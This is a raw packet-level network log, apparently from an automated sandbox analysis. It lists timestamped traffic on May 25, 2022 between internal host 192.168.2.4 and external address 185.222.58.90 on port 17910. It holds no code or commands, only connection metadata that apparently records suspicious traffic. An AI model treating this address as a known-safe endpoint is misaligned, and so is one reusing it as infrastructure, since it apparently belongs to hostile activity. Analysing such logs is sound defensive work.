May 25, 2022 15:08:08.151838064 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151861906 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151917934 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151941061 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151993990 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.151998997 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.152045012 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.152091026 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.152221918 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.152524948 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.152759075 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.153080940 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.153326035 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.153350115 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.153606892 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.153803110 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.154041052 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.154120922 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.154395103 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.154557943 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.155447006 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.155680895 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.155919075 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.155941963 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.155980110 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.156037092 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.156120062 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.156143904 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.156183004 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.156399012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.156600952 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.156888008 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.157120943 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.157361031 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.157604933 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.157932997 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.158205032 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.158370018 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.158607960 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.158880949 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.158911943 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.158938885 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.158984900 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.159033060 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.159060955 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.159288883 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.159573078 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.159770012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.173680067 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.173930883 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.174175024 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.174475908 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.174806118 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.174984932 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.175043106 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.199068069 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199129105 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199158907 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199187994 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199215889 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199240923 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199268103 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199294090 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199321985 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199318886 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.199402094 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199635983 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199664116 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.199747086 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.200066090 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.200339079 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.200544119 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201029062 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201057911 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201083899 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201112032 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201143980 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201170921 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201198101 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201258898 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201287031 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201311111 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201337099 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201370001 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.201410055 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.201416969 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.201421022 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.201437950 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201467037 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201503038 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.201509953 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.201536894 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.201844931 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.202467918 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.221957922 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.223901033 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.223978043 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.224013090 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.224041939 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.224067926 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.224095106 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.630223989 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.631453037 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.631628990 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.654112101 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.654292107 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.654481888 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.654571056 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.654728889 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.654829025 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.654974937 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.655096054 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.655260086 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.655520916 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.655646086 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.655766964 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.656111956 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.656223059 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.656286955 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.659173012 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.677459955 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.677609921 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.677794933 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.677809954 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.678033113 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.678093910 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.678112030 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.678276062 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.678348064 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.678571939 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.678637028 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.678803921 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.679035902 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.679101944 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.679336071 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.679569006 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.679864883 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.680104017 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.680336952 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.680629015 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.680811882 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.681473970 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.681734085 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.700274944 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.700496912 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.700704098 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.700989962 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.701148033 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.701261997 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.701594114 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.701751947 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.702027082 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.702231884 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.702503920 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.702666998 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.707083941 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716109991 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716161966 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716187000 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716214895 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716243029 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716401100 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716428041 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716607094 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716706038 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716830969 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716906071 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.716996908 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.717114925 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.717144012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.717227936 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.717473984 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.717503071 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.717588902 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.717669010 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.717746973 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.717776060 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.718009949 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.718036890 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.718194962 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.718271971 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.718348026 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.718626976 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.718950987 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.719029903 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.719125032 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.719238043 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.719439030 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.719525099 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.719552040 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.719636917 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.719716072 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.656524897 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.660119057 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.736594915 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.769032001 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.770179987 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.770302057 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.770373106 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.770421028 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.792691946 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.792876959 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.792898893 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.793000937 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.793155909 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.793220997 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.793227911 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.793276072 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.793399096 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.793464899 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.793592930 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.793652058 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.793869972 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.793946981 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.794171095 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.794233084 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.794450998 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.794517040 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.794689894 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.794747114 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.794886112 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.794943094 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.795166016 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.795228958 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.795444965 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.795521021 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.795682907 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.795747995 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.795921087 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.795979977 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.796161890 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.796222925 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.796439886 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.796503067 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.796663046 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.796726942 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.815305948 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815339088 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815366983 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815393925 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815418005 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.815452099 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.815455914 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.815540075 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815570116 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815597057 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815623045 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815732956 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815830946 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815860033 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.815886021 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816005945 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816239119 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816265106 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816292048 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816318989 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816395998 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816421986 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816451073 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816494942 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816595078 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816623926 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816648960 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816675901 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816745043 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816773891 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816801071 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.816987991 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817061901 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817104101 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817115068 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817131042 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817161083 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817183971 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817189932 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817197084 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817208052 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817218065 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817236900 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817245960 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817262888 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817274094 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817282915 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817301989 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817317009 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817353010 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817401886 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817430019 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817447901 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817457914 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817467928 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817483902 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817502022 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817521095 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817554951 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817583084 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817600965 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817610025 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817620039 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817636013 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817656040 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817663908 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817682028 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817709923 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817737103 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817781925 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817888021 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817914009 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.817934990 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817955017 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.817986965 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818013906 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818034887 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818042040 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818059921 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818069935 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818087101 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818144083 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818151951 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818170071 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818186045 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818197012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818212986 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818226099 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818243027 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818268061 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818337917 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818382025 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818408012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818435907 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818459988 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818463087 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818486929 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818491936 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818511009 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818519115 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818531036 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818563938 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:09.818592072 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:09.818618059 CEST	17910	49768	185.222.58.90	192.168.2.4
